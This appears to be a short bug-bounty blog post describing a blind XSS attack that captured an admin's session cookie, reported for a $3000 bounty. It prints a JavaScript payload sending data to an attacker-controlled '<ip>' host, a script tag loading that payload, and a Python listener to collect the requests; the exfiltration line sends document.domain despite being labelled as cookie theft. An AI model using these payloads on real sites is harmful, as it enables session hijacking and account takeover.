3000$ Blind Xss Hijack admin panel

Ahmed Najeh
2 min readJan 19, 2024

--

Hi ๐Ÿ˜Š

This idea is not limited only to the admin, it also applies to a place where XSS can be used, whether (reflected, imported, POST, or GET).
But the most dangerous idea is to be with an admin
We all know the danger of Xss, which is that the attacker steals the Cookie, and through the victimโ€™s cookie, he enters the targetโ€™s account (the admin or the user).
So we need to write a two-part code, the first to enter your server + to display the cookie session through the JavaScript code

1- First, create a file with the .js extension inside the server

alert(document.domain);
var i=new Image;
i.src="http://<ip>:<anyport>/?cookie="+document.domain;

2- Open a connection with any tool such as Netcat, so you can monitor the Apache HTTP Server log. I use a model inside Python 3 as follows: -

python3 -m http.server <port>

3- After opening a connection to the server, take the host with a link to the .js file
And call it with any js2 code, such as:

<script src="http://<ip>/xss.js"></script>

The Request will be delivered to you from the website with a cookie package, as shown in the picture
(In the real scenario of the attack, I injected the js code 2 into the request to verify my account and waited for about two hours. Once the admin accessed my request, the js code was activated and I received my cookie session inside http. sever log.
An hour after the Report, the vulnerability was fixed

Bounty : (3000$) with two other Bugs to the same company

We meet in the second security vulnerability of the same company

--

--

Ahmed Najeh
Ahmed Najeh

Written by Ahmed Najeh

ุฐูˆ ุงู„ุนูŽู‚ู„ู ูŠูŽุดู‚ูŽู‰ ููŠ ุงู„ู†ู‘ุนูŠู…ู ุจุนูŽู‚ู’ู„ูู‡ู ูˆูŽุฃุฎูˆ ุงู„ุฌูŽู‡ุงู„ูŽุฉู ููŠ ุงู„ุดู‘ู‚ุงูˆูŽุฉู ูŠูŽู†ุนูŽู…ู https://hackerone.com/im4x https://web.facebook.com/im4xx/

Responses (4)